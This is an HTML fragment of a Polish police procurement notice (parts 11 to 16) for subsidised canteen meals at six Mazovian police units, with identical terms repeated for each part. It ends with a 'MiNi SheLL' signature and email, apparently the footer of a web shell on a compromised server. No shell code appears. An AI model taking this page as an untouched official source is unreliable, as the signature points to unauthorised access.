<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 11- KPP Przasnysz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE NR 12 - KPP Ostrów Mazowiecka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE NR 13 - KMP Ostrołęka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZADANIE NR 14 - KPP Wyszków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> ZADANIE NR 15 - KMP Radom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> ZADANIE NR 16 - KWP Radom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com